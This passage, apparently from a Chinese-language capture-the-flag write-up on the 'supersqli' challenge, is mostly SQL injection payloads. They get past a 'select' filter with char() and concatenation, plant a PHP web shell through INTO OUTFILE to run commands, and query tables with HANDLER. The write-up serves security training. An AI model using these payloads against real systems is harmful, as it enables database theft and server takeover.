1';
SET @sql=concat(char(115,101,108,101,99,116)," * from `1919810931114514`");
PREPARE sqla from @sql;
EXECUTE sqla;
#
或者不用char()方法,直接将字符串相加也可以绕过限制:
-1';
SET @sql = CONCAT('se','lect * from `1919810931114514`;');
PREPARE sqla from @sql;
EXECUTE sqla;
#
3.RCE
报错注入后可以看见用户为root,直接上马拿权限。
先上马:
1';
Set @sql=concat("s","elect '<?php @print_r(`$_GET[oatmeal]`);?>' into outfile '/var/www/html/1",char(46),"php'");
PREPARE sqla from @sql;
EXECUTE sqla;
#
RCE:
/1.php?oatmeal=mysql -uroot -proot -e"use supersqli;select flag from \`1919810931114514\`;"
读flag。
4.handler
handler代替select进行查询。
1';
handler `1919810931114514` open as oatmeal;
handler oatmeal read first;
handler oatmeal close;#